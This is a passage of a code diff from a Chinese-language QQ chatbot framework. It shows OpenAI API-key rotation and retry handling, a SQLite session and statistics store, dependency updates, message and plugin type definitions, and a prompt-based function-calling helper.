||||
self.keys_data[self.chosen_api_key] = False
|
||||
ok = await self.switch_to_next_key()
|
||||
if ok: continue
|
||||
else: raise Exception("所有 OpenAI API Key 目前都不可用。")
|
||||
except BadRequestError as e:
|
||||
logger.warn(f"OpenAI 请求异常:{e}。")
|
||||
if "image_url is only supported by certain models." in str(e):
|
||||
raise Exception(f"当前模型 { self.model_configs['model'] } 不支持图片输入,请更换模型。")
|
||||
retry += 1
|
||||
except RateLimitError as e:
|
||||
if "You exceeded your current quota" in str(e):
|
||||
self.keys_data[self.chosen_api_key] = False
|
||||
ok = await self.switch_to_next_key()
|
||||
if ok: continue
|
||||
else: raise Exception("所有 OpenAI API Key 目前都不可用。")
|
||||
logger.error(f"OpenAI API Key {self.chosen_api_key} 达到请求速率限制或者官方服务器当前超载。详细原因:{e}")
|
||||
await self.switch_to_next_key()
|
||||
rate_limit_retry += 1
|
||||
time.sleep(1)
|
||||
except Exception as e:
|
||||
retry += 1
|
||||
if retry >= 3:
|
||||
logger.error(traceback.format_exc())
|
||||
raise Exception(f"OpenAI 请求失败:{e}。重试次数已达到上限。")
|
||||
if "maximum context length" in str(e):
|
||||
logger.warn(f"OpenAI 请求失败:{e}。上下文长度超过限制。尝试弹出最早的记录然后重试。")
|
||||
self.pop_record(session_id)
|
||||
|
||||
logger.warning(f"OpenAI 请求失败:{e}。重试第 {retry} 次。")
|
||||
time.sleep(1)
|
||||
|
||||
assert isinstance(completion, ChatCompletion)
|
||||
logger.debug(f"openai completion: {completion.usage}")
|
||||
|
||||
choice = completion.choices[0]
|
||||
|
||||
usage_tokens = completion.usage.total_tokens
|
||||
completion_tokens = completion.usage.completion_tokens
|
||||
self.session_memory[session_id][-1]['usage_tokens'] = usage_tokens
|
||||
self.session_memory[session_id][-1]['single_tokens'] += completion_tokens
|
||||
|
||||
if choice.message.content:
|
||||
# 返回文本
|
||||
completion_text = str(choice.message.content).strip()
|
||||
elif choice.message.tool_calls and choice.message.tool_calls:
|
||||
# tools call (function calling)
|
||||
return choice.message.tool_calls[0].function
|
||||
|
||||
self.session_memory[session_id][-1]['AI'] = {
|
||||
"role": "assistant",
|
||||
"content": completion_text
|
||||
}
|
||||
|
||||
return completion_text
|
||||
|
||||
async def switch_to_next_key(self):
|
||||
'''
|
||||
切换到下一个 API Key
|
||||
'''
|
||||
if not self.api_keys:
|
||||
logger.error("OpenAI API Key 不存在。")
|
||||
return False
|
||||
|
||||
for key in self.keys_data:
|
||||
if self.keys_data[key]:
|
||||
# 没超额
|
||||
self.chosen_api_key = key
|
||||
self.client.api_key = key
|
||||
logger.info(f"OpenAI 切换到 API Key {key[:10]}... 成功。")
|
||||
return True
|
||||
|
||||
return False
|
||||
|
||||
async def image_generate(self, prompt, session_id, **kwargs) -> str:
|
||||
'''
|
||||
生成图片
|
||||
'''
|
||||
retry = 0
|
||||
conf = self.image_generator_model_configs
|
||||
if not conf:
|
||||
logger.error("OpenAI 图片生成模型配置不存在。")
|
||||
raise Exception("OpenAI 图片生成模型配置不存在。")
|
||||
|
||||
while retry < 3:
|
||||
try:
|
||||
images_response = await self.client.images.generate(
|
||||
prompt=prompt,
|
||||
**conf
|
||||
)
|
||||
image_url = images_response.data[0].url
|
||||
return image_url
|
||||
except Exception as e:
|
||||
retry += 1
|
||||
if retry >= 3:
|
||||
logger.error(traceback.format_exc())
|
||||
raise Exception(f"OpenAI 图片生成请求失败:{e}。重试次数已达到上限。")
|
||||
logger.warning(f"OpenAI 图片生成请求失败:{e}。重试第 {retry} 次。")
|
||||
time.sleep(1)
|
||||
|
||||
async def forget(self, session_id=None, keep_system_prompt: bool=False) -> bool:
|
||||
if session_id is None: return False
|
||||
self.session_memory[session_id] = []
|
||||
if keep_system_prompt:
|
||||
self.personality_set(self.curr_personality, session_id)
|
||||
else:
|
||||
self.curr_personality = self.DEFAULT_PERSONALITY
|
||||
return True
|
||||
|
||||
def dump_contexts_page(self, session_id: str, size=5, page=1,):
|
||||
'''
|
||||
获取缓存的会话
|
||||
'''
|
||||
# contexts_str = ""
|
||||
# for i, key in enumerate(self.session_memory):
|
||||
# if i < (page-1)*size or i >= page*size:
|
||||
# continue
|
||||
# contexts_str += f"Session ID: {key}\n"
|
||||
# for record in self.session_memory[key]:
|
||||
# if "user" in record:
|
||||
# contexts_str += f"User: {record['user']['content']}\n"
|
||||
# if "AI" in record:
|
||||
# contexts_str += f"AI: {record['AI']['content']}\n"
|
||||
# contexts_str += "---\n"
|
||||
contexts_str = ""
|
||||
if session_id in self.session_memory:
|
||||
for record in self.session_memory[session_id]:
|
||||
if "user" in record and record['user']:
|
||||
text = record['user']['content'][:100] + "..." if len(record['user']['content']) > 100 else record['user']['content']
|
||||
contexts_str += f"User: {text}\n"
|
||||
if "AI" in record and record['AI']:
|
||||
text = record['AI']['content'][:100] + "..." if len(record['AI']['content']) > 100 else record['AI']['content']
|
||||
contexts_str += f"Assistant: {text}\n"
|
||||
else:
|
||||
contexts_str = "会话 ID 不存在。"
|
||||
|
||||
return contexts_str, len(self.session_memory[session_id])
|
||||
|
||||
def set_model(self, model: str):
|
||||
self.model_configs['model'] = model
|
||||
|
||||
def get_configs(self):
|
||||
return self.model_configs
|
||||
|
||||
def get_keys_data(self):
|
||||
return self.keys_data
|
||||
|
||||
def get_curr_key(self):
|
||||
return self.chosen_api_key
|
||||
|
||||
def set_key(self, key):
|
||||
self.client.api_key = key
|
||||
35
model/provider/provider.py
Normal file
@@ -0,0 +1,35 @@
|
||||
class Provider:
|
||||
async def text_chat(self,
|
||||
prompt: str,
|
||||
session_id: str,
|
||||
image_url: None = None,
|
||||
tools: None = None,
|
||||
extra_conf: dict = None,
|
||||
default_personality: dict = None,
|
||||
**kwargs) -> str:
|
||||
'''
|
||||
[require]
|
||||
prompt: 提示词
|
||||
session_id: 会话id
|
||||
|
||||
[optional]
|
||||
image_url: 图片url(识图)
|
||||
tools: 函数调用工具
|
||||
extra_conf: 额外配置
|
||||
default_personality: 默认人格
|
||||
'''
|
||||
raise NotImplementedError
|
||||
|
||||
async def image_generate(self, prompt, session_id, **kwargs) -> str:
|
||||
'''
|
||||
[require]
|
||||
prompt: 提示词
|
||||
session_id: 会话id
|
||||
'''
|
||||
raise NotImplementedError
|
||||
|
||||
async def forget(self, session_id=None) -> bool:
|
||||
'''
|
||||
重置会话
|
||||
'''
|
||||
raise NotImplementedError
|
||||
296
persist/session.py
Normal file
@@ -0,0 +1,296 @@
|
||||
import sqlite3
|
||||
import os
|
||||
import shutil
|
||||
import time
|
||||
from typing import Tuple
|
||||
|
||||
|
||||
class dbConn():
|
||||
def __init__(self):
|
||||
db_path = "data/data.db"
|
||||
if os.path.exists("data.db"):
|
||||
shutil.copy("data.db", db_path)
|
||||
conn = sqlite3.connect(db_path)
|
||||
conn.text_factory = str
|
||||
self.conn = conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
CREATE TABLE IF NOT EXISTS tb_session(
|
||||
qq_id VARCHAR(32) PRIMARY KEY,
|
||||
history TEXT
|
||||
);
|
||||
'''
|
||||
)
|
||||
c.execute(
|
||||
'''
|
||||
CREATE TABLE IF NOT EXISTS tb_stat_session(
|
||||
platform VARCHAR(32),
|
||||
session_id VARCHAR(32),
|
||||
cnt INTEGER
|
||||
);
|
||||
'''
|
||||
)
|
||||
c.execute(
|
||||
'''
|
||||
CREATE TABLE IF NOT EXISTS tb_stat_message(
|
||||
ts INTEGER,
|
||||
cnt INTEGER
|
||||
);
|
||||
'''
|
||||
)
|
||||
c.execute(
|
||||
'''
|
||||
CREATE TABLE IF NOT EXISTS tb_stat_platform(
|
||||
ts INTEGER,
|
||||
platform VARCHAR(32),
|
||||
cnt INTEGER
|
||||
);
|
||||
'''
|
||||
)
|
||||
|
||||
conn.commit()
|
||||
|
||||
def insert_session(self, qq_id, history):
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
INSERT INTO tb_session(qq_id, history) VALUES (?, ?)
|
||||
''', (qq_id, history)
|
||||
)
|
||||
conn.commit()
|
||||
|
||||
def update_session(self, qq_id, history):
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
UPDATE tb_session SET history = ? WHERE qq_id = ?
|
||||
''', (history, qq_id)
|
||||
)
|
||||
conn.commit()
|
||||
|
||||
def get_session(self, qq_id):
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
SELECT * FROM tb_session WHERE qq_id = ?
|
||||
''', (qq_id, )
|
||||
)
|
||||
return c.fetchone()
|
||||
|
||||
def get_all_session(self):
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
SELECT * FROM tb_session
|
||||
'''
|
||||
)
|
||||
return c.fetchall()
|
||||
|
||||
def check_session(self, qq_id):
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
SELECT * FROM tb_session WHERE qq_id = ?
|
||||
''', (qq_id, )
|
||||
)
|
||||
return c.fetchone() is not None
|
||||
|
||||
def delete_session(self, qq_id):
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
DELETE FROM tb_session WHERE qq_id = ?
|
||||
''', (qq_id, )
|
||||
)
|
||||
conn.commit()
|
||||
|
||||
def increment_stat_session(self, platform, session_id, cnt):
|
||||
# if not exist, insert
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
|
||||
if self.check_stat_session(platform, session_id):
|
||||
c.execute(
|
||||
'''
|
||||
UPDATE tb_stat_session SET cnt = cnt + ? WHERE platform = ? AND session_id = ?
|
||||
''', (cnt, platform, session_id)
|
||||
)
|
||||
conn.commit()
|
||||
else:
|
||||
c.execute(
|
||||
'''
|
||||
INSERT INTO tb_stat_session(platform, session_id, cnt) VALUES (?, ?, ?)
|
||||
''', (platform, session_id, cnt)
|
||||
)
|
||||
conn.commit()
|
||||
|
||||
def check_stat_session(self, platform, session_id):
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
SELECT * FROM tb_stat_session WHERE platform = ? AND session_id = ?
|
||||
''', (platform, session_id)
|
||||
)
|
||||
return c.fetchone() is not None
|
||||
|
||||
def get_all_stat_session(self):
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
SELECT * FROM tb_stat_session
|
||||
'''
|
||||
)
|
||||
return c.fetchall()
|
||||
|
||||
def get_session_cnt_total(self):
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
SELECT COUNT(*) FROM tb_stat_session
|
||||
'''
|
||||
)
|
||||
return c.fetchone()[0]
|
||||
|
||||
def increment_stat_message(self, ts, cnt):
|
||||
# 以一个小时为单位。ts的单位是秒。
|
||||
# 找到最近的一个小时,如果没有,就插入
|
||||
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
|
||||
ok, new_ts = self.check_stat_message(ts)
|
||||
|
||||
if ok:
|
||||
c.execute(
|
||||
'''
|
||||
UPDATE tb_stat_message SET cnt = cnt + ? WHERE ts = ?
|
||||
''', (cnt, new_ts)
|
||||
)
|
||||
conn.commit()
|
||||
else:
|
||||
c.execute(
|
||||
'''
|
||||
INSERT INTO tb_stat_message(ts, cnt) VALUES (?, ?)
|
||||
''', (new_ts, cnt)
|
||||
)
|
||||
conn.commit()
|
||||
|
||||
def check_stat_message(self, ts) -> Tuple[bool, int]:
|
||||
# 换算成当地整点的时间戳
|
||||
|
||||
ts = ts - ts % 3600
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
SELECT * FROM tb_stat_message WHERE ts = ?
|
||||
''', (ts, )
|
||||
)
|
||||
if c.fetchone() is not None:
|
||||
return True, ts
|
||||
else:
|
||||
return False, ts
|
||||
|
||||
def get_last_24h_stat_message(self):
|
||||
# 获取最近24小时的消息统计
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
SELECT * FROM tb_stat_message WHERE ts > ?
|
||||
''', (time.time() - 86400, )
|
||||
)
|
||||
return c.fetchall()
|
||||
|
||||
def get_message_cnt_total(self) -> int:
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
SELECT SUM(cnt) FROM tb_stat_message
|
||||
'''
|
||||
)
|
||||
return c.fetchone()[0]
|
||||
|
||||
def increment_stat_platform(self, ts, platform, cnt):
|
||||
# 以一个小时为单位。ts的单位是秒。
|
||||
# 找到最近的一个小时,如果没有,就插入
|
||||
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
|
||||
ok, new_ts = self.check_stat_platform(ts, platform)
|
||||
|
||||
if ok:
|
||||
c.execute(
|
||||
'''
|
||||
UPDATE tb_stat_platform SET cnt = cnt + ? WHERE ts = ? AND platform = ?
|
||||
''', (cnt, new_ts, platform)
|
||||
)
|
||||
conn.commit()
|
||||
else:
|
||||
c.execute(
|
||||
'''
|
||||
INSERT INTO tb_stat_platform(ts, platform, cnt) VALUES (?, ?, ?)
|
||||
''', (new_ts, platform, cnt)
|
||||
)
|
||||
conn.commit()
|
||||
|
||||
def check_stat_platform(self, ts, platform):
|
||||
# 换算成当地整点的时间戳
|
||||
|
||||
ts = ts - ts % 3600
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
SELECT * FROM tb_stat_platform WHERE ts = ? AND platform = ?
|
||||
''', (ts, platform)
|
||||
)
|
||||
if c.fetchone() is not None:
|
||||
return True, ts
|
||||
else:
|
||||
return False, ts
|
||||
|
||||
def get_last_24h_stat_platform(self):
|
||||
# 获取最近24小时的消息统计
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
SELECT * FROM tb_stat_platform WHERE ts > ?
|
||||
''', (time.time() - 86400, )
|
||||
)
|
||||
return c.fetchall()
|
||||
|
||||
def get_platform_cnt_total(self) -> int:
|
||||
conn = self.conn
|
||||
c = conn.cursor()
|
||||
c.execute(
|
||||
'''
|
||||
SELECT platform, SUM(cnt) FROM tb_stat_platform GROUP BY platform
|
||||
'''
|
||||
)
|
||||
# return c.fetchall()
|
||||
platforms = []
|
||||
ret = c.fetchall()
|
||||
for i in ret:
|
||||
# platforms[i[0]] = i[1]
|
||||
platforms.append({
|
||||
"name": i[0],
|
||||
"count": i[1]
|
||||
})
|
||||
return platforms
|
||||
|
||||
def close(self):
|
||||
self.conn.close()
|
||||
@@ -1,3 +1,19 @@
|
||||
requests~=2.27.1
|
||||
openai~=0.27.0
|
||||
qq-botpy~=1.1.2
|
||||
pydantic~=1.10.4
|
||||
aiohttp
|
||||
requests
|
||||
openai~=1.2.3
|
||||
qq-botpy
|
||||
chardet~=5.1.0
|
||||
Pillow
|
||||
GitPython
|
||||
nakuru-project
|
||||
beautifulsoup4
|
||||
googlesearch-python
|
||||
tiktoken
|
||||
readability-lxml
|
||||
baidu-aip
|
||||
websockets
|
||||
flask
|
||||
psutil
|
||||
lxml_html_clean
|
||||
SparkleLogging
|
||||
|
||||
BIN
resources/fonts/syst.otf
Normal file
|
Before Width: | Height: | Size: 143 KiB |
|
Before Width: | Height: | Size: 110 KiB |
|
Before Width: | Height: | Size: 241 KiB |
|
Before Width: | Height: | Size: 239 KiB |
|
Before Width: | Height: | Size: 59 KiB |
28
type/command.py
Normal file
@@ -0,0 +1,28 @@
|
||||
from typing import Union, List, Callable
|
||||
from dataclasses import dataclass
|
||||
|
||||
|
||||
@dataclass
|
||||
class CommandItem():
|
||||
'''
|
||||
用来描述单个指令
|
||||
'''
|
||||
|
||||
command_name: Union[str, tuple] # 指令名
|
||||
callback: Callable # 回调函数
|
||||
description: str # 描述
|
||||
origin: str # 注册来源
|
||||
|
||||
class CommandResult():
|
||||
'''
|
||||
用于在Command中返回多个值
|
||||
'''
|
||||
|
||||
def __init__(self, hit: bool, success: bool, message_chain: list, command_name: str = "unknown_command") -> None:
|
||||
self.hit = hit
|
||||
self.success = success
|
||||
self.message_chain = message_chain
|
||||
self.command_name = command_name
|
||||
|
||||
def _result_tuple(self):
|
||||
return (self.success, self.message_chain, self.command_name)
|
||||
62
type/message.py
Normal file
@@ -0,0 +1,62 @@
|
||||
from enum import Enum
|
||||
from typing import List
|
||||
from dataclasses import dataclass
|
||||
from nakuru.entities.components import BaseMessageComponent
|
||||
|
||||
from type.register import RegisteredPlatform
|
||||
from type.types import GlobalObject
|
||||
|
||||
class MessageType(Enum):
|
||||
GROUP_MESSAGE = 'GroupMessage' # 群组形式的消息
|
||||
FRIEND_MESSAGE = 'FriendMessage' # 私聊、好友等单聊消息
|
||||
GUILD_MESSAGE = 'GuildMessage' # 频道消息
|
||||
|
||||
|
||||
@dataclass
|
||||
class MessageMember():
|
||||
user_id: str # 发送者id
|
||||
nickname: str = None
|
||||
|
||||
|
||||
class AstrBotMessage():
|
||||
'''
|
||||
AstrBot 的消息对象
|
||||
'''
|
||||
tag: str # 消息来源标签
|
||||
type: MessageType # 消息类型
|
||||
self_id: str # 机器人的识别id
|
||||
session_id: str # 会话id
|
||||
message_id: str # 消息id
|
||||
sender: MessageMember # 发送者
|
||||
message: List[BaseMessageComponent] # 消息链使用 Nakuru 的消息链格式
|
||||
message_str: str # 最直观的纯文本消息字符串
|
||||
raw_message: object
|
||||
timestamp: int # 消息时间戳
|
||||
|
||||
def __str__(self) -> str:
|
||||
return str(self.__dict__)
|
||||
|
||||
class AstrMessageEvent():
|
||||
'''
|
||||
消息事件。
|
||||
'''
|
||||
context: GlobalObject # 一些公用数据
|
||||
message_str: str # 纯消息字符串
|
||||
message_obj: AstrBotMessage # 消息对象
|
||||
platform: RegisteredPlatform # 来源平台
|
||||
role: str # 基本身份。`admin` 或 `member`
|
||||
session_id: int # 会话 id
|
||||
|
||||
def __init__(self,
|
||||
message_str: str,
|
||||
message_obj: AstrBotMessage,
|
||||
platform: RegisteredPlatform,
|
||||
role: str,
|
||||
context: GlobalObject,
|
||||
session_id: str = None):
|
||||
self.context = context
|
||||
self.message_str = message_str
|
||||
self.message_obj = message_obj
|
||||
self.platform = platform
|
||||
self.role = role
|
||||
self.session_id = session_id
|
||||
27
type/plugin.py
Normal file
@@ -0,0 +1,27 @@
|
||||
from enum import Enum
|
||||
from dataclasses import dataclass
|
||||
|
||||
class PluginType(Enum):
|
||||
PLATFORM = 'platfrom' # 平台类插件。
|
||||
LLM = 'llm' # 大语言模型类插件
|
||||
COMMON = 'common' # 其他插件
|
||||
|
||||
|
||||
@dataclass
|
||||
class PluginMetadata:
|
||||
'''
|
||||
插件的元数据。
|
||||
'''
|
||||
# required
|
||||
plugin_name: str
|
||||
plugin_type: PluginType
|
||||
author: str # 插件作者
|
||||
desc: str # 插件简介
|
||||
version: str # 插件版本
|
||||
|
||||
# optional
|
||||
repo: str = None # 插件仓库地址
|
||||
|
||||
def __str__(self) -> str:
|
||||
return f"PluginMetadata({self.plugin_name}, {self.plugin_type}, {self.desc}, {self.version}, {self.repo})"
|
||||
|
||||
46
type/register.py
Normal file
@@ -0,0 +1,46 @@
|
||||
from model.provider.provider import Provider as LLMProvider
|
||||
from model.platform._platfrom import Platform
|
||||
from type.plugin import *
|
||||
from typing import List
|
||||
from types import ModuleType
|
||||
from dataclasses import dataclass
|
||||
|
||||
@dataclass
|
||||
class RegisteredPlugin:
|
||||
'''
|
||||
注册在 AstrBot 中的插件。
|
||||
'''
|
||||
metadata: PluginMetadata
|
||||
plugin_instance: object
|
||||
module_path: str
|
||||
module: ModuleType
|
||||
root_dir_name: str
|
||||
|
||||
def __str__(self) -> str:
|
||||
return f"RegisteredPlugin({self.metadata}, {self.module_path}, {self.root_dir_name})"
|
||||
|
||||
|
||||
RegisteredPlugins = List[RegisteredPlugin]
|
||||
|
||||
|
||||
@dataclass
|
||||
class RegisteredPlatform:
|
||||
'''
|
||||
注册在 AstrBot 中的平台。平台应当实现 Platform 接口。
|
||||
'''
|
||||
platform_name: str
|
||||
platform_instance: Platform
|
||||
origin: str = None # 注册来源
|
||||
|
||||
def __str__(self) -> str:
|
||||
return self.platform_name
|
||||
|
||||
|
||||
@dataclass
|
||||
class RegisteredLLM:
|
||||
'''
|
||||
注册在 AstrBot 中的大语言模型调用。大语言模型应当实现 LLMProvider 接口。
|
||||
'''
|
||||
llm_name: str
|
||||
llm_instance: LLMProvider
|
||||
origin: str = None # 注册来源
|
||||
34
type/types.py
Normal file
@@ -0,0 +1,34 @@
|
||||
from type.register import *
|
||||
from typing import List
|
||||
|
||||
class GlobalObject:
|
||||
'''
|
||||
存放一些公用的数据,用于在不同模块(如core与command)之间传递
|
||||
'''
|
||||
version: str # 机器人版本
|
||||
nick: tuple # 用户定义的机器人的别名
|
||||
base_config: dict # config.json 中导出的配置
|
||||
cached_plugins: List[RegisteredPlugin] # 加载的插件
|
||||
platforms: List[RegisteredPlatform]
|
||||
llms: List[RegisteredLLM]
|
||||
|
||||
web_search: bool # 是否开启了网页搜索
|
||||
reply_prefix: str # 回复前缀
|
||||
unique_session: bool # 是否开启了独立会话
|
||||
cnt_total: int # 总消息数
|
||||
default_personality: dict
|
||||
dashboard_data = None
|
||||
|
||||
def __init__(self):
|
||||
self.nick = None # gocq 的昵称
|
||||
self.base_config = None # config.yaml
|
||||
self.cached_plugins = [] # 缓存的插件
|
||||
self.web_search = False # 是否开启了网页搜索
|
||||
self.reply_prefix = None
|
||||
self.unique_session = False
|
||||
self.cnt_total = 0
|
||||
self.platforms = []
|
||||
self.llms = []
|
||||
self.default_personality = None
|
||||
self.dashboard_data = None
|
||||
self.stat = {}
|
||||
247
util/agent/func_call.py
Normal file
@@ -0,0 +1,247 @@
|
||||
|
||||
import json
|
||||
import util.general_utils as gu
|
||||
|
||||
import time
|
||||
|
||||
|
||||
class FuncCallJsonFormatError(Exception):
|
||||
def __init__(self, msg):
|
||||
self.msg = msg
|
||||
|
||||
def __str__(self):
|
||||
return self.msg
|
||||
|
||||
|
||||
class FuncNotFoundError(Exception):
|
||||
def __init__(self, msg):
|
||||
self.msg = msg
|
||||
|
||||
def __str__(self):
|
||||
return self.msg
|
||||
|
||||
|
||||
class FuncCall():
|
||||
def __init__(self, provider) -> None:
|
||||
self.func_list = []
|
||||
self.provider = provider
|
||||
|
||||
def add_func(self, name: str = None, func_args: list = None, desc: str = None, func_obj=None) -> None:
|
||||
if name == None or func_args == None or desc == None or func_obj == None:
|
||||
raise FuncCallJsonFormatError(
|
||||
"name, func_args, desc must be provided.")
|
||||
params = {
|
||||
"type": "object", # hardcore here
|
||||
"properties": {}
|
||||
}
|
||||
for param in func_args:
|
||||
params['properties'][param['name']] = {
|
||||
"type": param['type'],
|
||||
"description": param['description']
|
||||
}
|
||||
self._func = {
|
||||
"name": name,
|
||||
"parameters": params,
|
||||
"description": desc,
|
||||
"func_obj": func_obj,
|
||||
}
|
||||
self.func_list.append(self._func)
|
||||
|
||||
def func_dump(self, intent: int = 2) -> str:
|
||||
_l = []
|
||||
for f in self.func_list:
|
||||
_l.append({
|
||||
"name": f["name"],
|
||||
"parameters": f["parameters"],
|
||||
"description": f["description"],
|
||||
})
|
||||
return json.dumps(_l, indent=intent, ensur_ascii=False)
|
||||
|
||||
def get_func(self) -> list:
|
||||
_l = []
|
||||
for f in self.func_list:
|
||||
_l.append({
|
||||
"type": "function",
|
||||
"function": {
|
||||
"name": f["name"],
|
||||
"parameters": f["parameters"],
|
||||
"description": f["description"],
|
||||
}
|
||||
})
|
||||
return _l
|
||||
|
||||
def func_call(self, question, func_definition, is_task=False, tasks=None, taskindex=-1, is_summary=True, session_id=None):
|
||||
|
||||
funccall_prompt = """
|
||||
我正实现function call功能,该功能旨在让你变成给定的问题到给定的函数的解析器(意味着你不是创造函数)。
|
||||
下面会给你提供可能用到的函数相关信息和一个问题,你需要将其转换成给定的函数调用。
|
||||
- 你的返回信息只含json,请严格仿照以下内容(不含注释),必须含有`res`,`func_call`字段:
|
||||
```
|
||||
{
|
||||
"res": string // 如果没有找到对应的函数,那么你可以在这里正常输出内容。如果有,这里是空字符串。
|
||||
"func_call": [ // 这是一个数组,里面包含了所有的函数调用,如果没有函数调用,那么这个数组是空数组。
|
||||
{
|
||||
"res": string // 如果没有找到对应的函数,那么你可以在这里正常输出内容。如果有,这里是空字符串。
|
||||
"name": str, // 函数的名字
|
||||
"args_type": {
|
||||
"arg1": str, // 函数的参数的类型
|
||||
"arg2": str,
|
||||
...
|
||||
},
|
||||
"args": {
|
||||
"arg1": any, // 函数的参数
|
||||
"arg2": any,
|
||||
...
|
||||
}
|
||||
},
|
||||
... // 可能在这个问题中会有多个函数调用
|
||||
],
|
||||
}
|
||||
```
|
||||
- 如果用户的要求较复杂,允许返回多个函数调用,但需保证这些函数调用的顺序正确。
|
||||
- 当问题没有提到给定的函数时,相当于提问方不打算使用function call功能,这时你可以在res中正常输出这个问题的回答(以AI的身份正常回答该问题,并将答案输出在res字段中,回答不要涉及到任何函数调用的内容,就只是正常讨论这个问题。)
|
||||
|
||||
提供的函数是:
|
||||
|
||||
"""
|
||||
|
||||
prompt = f"{funccall_prompt}\n```\n{func_definition}\n```\n"
|
||||
prompt += f"""
|
||||
用户的提问是:
|
||||
```
|
||||
{question}
|
||||
```
|
||||
"""
|
||||
|
||||
# if is_task:
|
||||
# # task_prompt = f"\n任务列表为{str(tasks)}\n你目前进行到了任务{str(taskindex)}, **你不需要重新进行已经进行过的任务, 不要生成已经进行过的**"
|
||||
# prompt += task_prompt
|
||||
|
||||
# provider.forget()
|
||||
|
||||
_c = 0
|
||||
while _c < 3:
|
||||
try:
|
||||
res = self.provider.text_chat(prompt, session_id)
|
||||
if res.find('```') != -1:
|
||||
res = res[res.find('```json') + 7: res.rfind('```')]
|
||||
gu.log("REVGPT func_call json result",
|
||||
bg=gu.BG_COLORS["green"], fg=gu.FG_COLORS["white"])
|
||||
print(res)
|
||||
res = json.loads(res)
|
||||
break
|
||||
except Exception as e:
|
||||
_c += 1
|
||||
if _c == 3:
|
||||
raise e
|
||||
if "The message you submitted was too long" in str(e):
|
||||
raise e
|
||||
|
||||
invoke_func_res = ""
|
||||
|
||||
if "func_call" in res and len(res["func_call"]) > 0:
|
||||
task_list = res["func_call"]
|
||||
|
||||
invoke_func_res_list = []
|
||||
|
||||
for res in task_list:
|
||||
# 说明有函数调用
|
||||
func_name = res["name"]
|
||||
# args_type = res["args_type"]
|
||||
args = res["args"]
|
||||
# 调用函数
|
||||
# func = eval(func_name)
|
||||
func_target = None
|
||||
for func in self.func_list:
|
||||
if func["name"] == func_name:
|
||||
func_target = func["func_obj"]
|
||||
break
|
||||
if func_target == None:
|
||||
raise FuncNotFoundError(
|
||||
f"Request function {func_name} not found.")
|
||||
t_res = str(func_target(**args))
|
||||
invoke_func_res += f"{func_name} 调用结果:\n```\n{t_res}\n```\n"
|
||||
invoke_func_res_list.append(invoke_func_res)
|
||||
gu.log(f"[FUNC| {func_name} invoked]",
|
||||
bg=gu.BG_COLORS["green"], fg=gu.FG_COLORS["white"])
|
||||
# print(str(t_res))
|
||||
|
||||
if is_summary:
|
||||
|
||||
# 生成返回结果
|
||||
after_prompt = """
|
||||
有以下内容:"""+invoke_func_res+"""
|
||||
请以AI助手的身份结合返回的内容对用户提问做详细全面的回答。
|
||||
用户的提问是:
|
||||
```""" + question + """```
|
||||
- 在res字段中,不要输出函数的返回值,也不要针对返回值的字段进行分析,也不要输出用户的提问,而是理解这一段返回的结果,并以AI助手的身份回答问题,只需要输出回答的内容,不需要在回答的前面加上身份词。
|
||||
- 你的返回信息必须只能是json,且需严格遵循以下内容(不含注释):
|
||||
```json
|
||||
{
|
||||
"res": string, // 回答的内容
|
||||
"func_call_again": bool // 如果函数返回的结果有错误或者问题,可将其设置为true,否则为false
|
||||
}
|
||||
```
|
||||
- 如果func_call_again为true,res请你设为空值,否则请你填写回答的内容。"""
|
||||
|
||||
_c = 0
|
||||
while _c < 5:
|
||||
try:
|
||||
res = self.provider.text_chat(after_prompt, session_id)
|
||||
# 截取```之间的内容
|
||||
gu.log(
|
||||
"DEBUG BEGIN", bg=gu.BG_COLORS["yellow"], fg=gu.FG_COLORS["white"])
|
||||
print(res)
|
||||
gu.log(
|
||||
"DEBUG END", bg=gu.BG_COLORS["yellow"], fg=gu.FG_COLORS["white"])
|
||||
if res.find('```') != -1:
|
||||
res = res[res.find('```json') +
|
||||
7: res.rfind('```')]
|
||||
gu.log("REVGPT after_func_call json result",
|
||||
bg=gu.BG_COLORS["green"], fg=gu.FG_COLORS["white"])
|
||||
after_prompt_res = res
|
||||
after_prompt_res = json.loads(after_prompt_res)
|
||||
break
|
||||
except Exception as e:
|
||||
_c += 1
|
||||
if _c == 5:
|
||||
raise e
|
||||
if "The message you submitted was too long" in str(e):
|
||||
# 如果返回的内容太长了,那么就截取一部分
|
||||
time.sleep(3)
|
||||
invoke_func_res = invoke_func_res[:int(
|
||||
len(invoke_func_res) / 2)]
|
||||
after_prompt = """
|
||||
函数返回以下内容:"""+invoke_func_res+"""
|
||||
请以AI助手的身份结合返回的内容对用户提问做详细全面的回答。
|
||||
用户的提问是:
|
||||
```""" + question + """```
|
||||
- 在res字段中,不要输出函数的返回值,也不要针对返回值的字段进行分析,也不要输出用户的提问,而是理解这一段返回的结果,并以AI助手的身份回答问题,只需要输出回答的内容,不需要在回答的前面加上身份词。
|
||||
- 你的返回信息必须只能是json,且需严格遵循以下内容(不含注释):
|
||||
```json
|
||||
{
|
||||
"res": string, // 回答的内容
|
||||
